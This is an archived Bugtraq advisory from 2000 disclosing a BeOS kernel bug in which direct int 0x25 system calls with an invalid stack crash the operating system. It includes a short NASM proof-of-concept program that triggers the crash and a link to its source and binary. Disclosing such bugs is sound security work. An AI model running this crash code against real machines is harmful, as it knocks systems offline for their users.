[14492] in bugtraq
BeOS syscall bug
daemon@ATHENA.MIT.EDU (Konstantin Boldyshev)
Mon Apr 10 15:51:30 2000
Message-Id: <20000410131628.659.qmail@securityfocus.com>
Date: Mon, 10 Apr 2000 13:16:28 -0000
Reply-To: Konstantin Boldyshev <konst@LINUXASSEMBLY.ORG>
From: Konstantin Boldyshev <konst@LINUXASSEMBLY.ORG>
X-To: bugtraq@securityfocus.com
To: BUGTRAQ@SECURITYFOCUS.COM
Summary:
BeOS crashes when system call with invalid parameters is
issued.
Details:
When using direct kernel calls through int 0x25 (not
libroot.so functions) BeOS dies on most system calls with
invalid parameters/stack. Allthough Be has registered this
bug before R5.0, it is present in R5.0, and is present at
least in all R4.5.x
(http://bebugs.be.com/devbugs/detail.php3?oid=2324160).
No fix is available, it's a kernel bug.
Here's a sample assembly program that kills BeOS (nasm):
section .text
global _start
_start:
push dword msg
push dword len
push dword 1 ;stdout
mov eax,3 ;sys_write
int 0x25 ;must be a *call* to int 0x25,
;then everything goes ok; i.e.
;return address must be on the stack,
;but it is not
mov eax,0x3f ;sys_exit
int 0x25
msg db "hello",0xa
len equ $ - msg
(source and binary can be downloaded at
http://linuxassembly.org/BeDie.tgz)
References:
http://www.escribe.com/software/bedevtalk/ - BeDevTalk
archives
(Feb-Mar 2000, search for topics "assembly & BeOS", "system
calls", "system call stress testing"
http://linuxassembly.org - Linux/UNIX assembly programming
portal
